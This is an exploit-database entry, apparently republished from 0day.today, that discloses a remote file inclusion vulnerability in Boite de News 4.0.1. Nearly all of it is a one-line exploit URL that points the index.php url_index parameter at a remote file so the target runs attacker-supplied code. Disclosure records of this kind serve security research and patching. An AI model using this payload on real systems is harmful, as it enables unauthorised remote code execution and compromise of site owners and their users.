id: 668
date: 08/08/2006
title: Boite de News <= 4.0.1 (index.php) Remote File Inclusion Vulnerability
author: the master
cves: 

======================================================================
Boite de News <= 4.0.1 (index.php) Remote File Inclusion Vulnerability
======================================================================


########################################################################
#  Boite de News v4.0.1  Remote File Inclusion Vulnerability
#
#
#  Found By: the master
#
########################################################################
#  exploit:
#
#  http://[Target]/[Path]/boitenews4/index.php?url_index=http://cmd.gif?
########################################################################



#  0day.today [2023-03-26]  #